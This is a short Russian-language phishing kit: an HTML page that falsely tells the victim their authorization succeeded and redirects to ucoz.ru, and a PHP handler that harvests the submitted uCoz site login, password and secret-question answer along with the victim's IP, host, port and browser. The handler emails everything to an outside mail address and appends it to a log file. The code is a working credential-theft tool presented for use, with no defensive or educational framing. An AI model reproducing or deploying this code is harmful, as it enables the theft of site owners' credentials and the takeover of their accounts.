<html>
<head>
<font size=8 color="blue"> Авторизация прошла успешно, ваши результаты занесены в базу данных.</font></p>
<meta http-equiv="Refresh" content="0; http://ucoz.ru">
</body>
</html>

<?PHP
$Login = $_POST['login']; //Логин
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR")); 
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$Sekret = $_POST['sekret'];

$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Сайт:$Login.ucoz.ru Пасс:$Pass Ответ на секретный вопрос:$Sekret";
$to = "olya.88.88@list.ru"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от сайта: $Login.ucoz.ru "; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail

$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем

?>
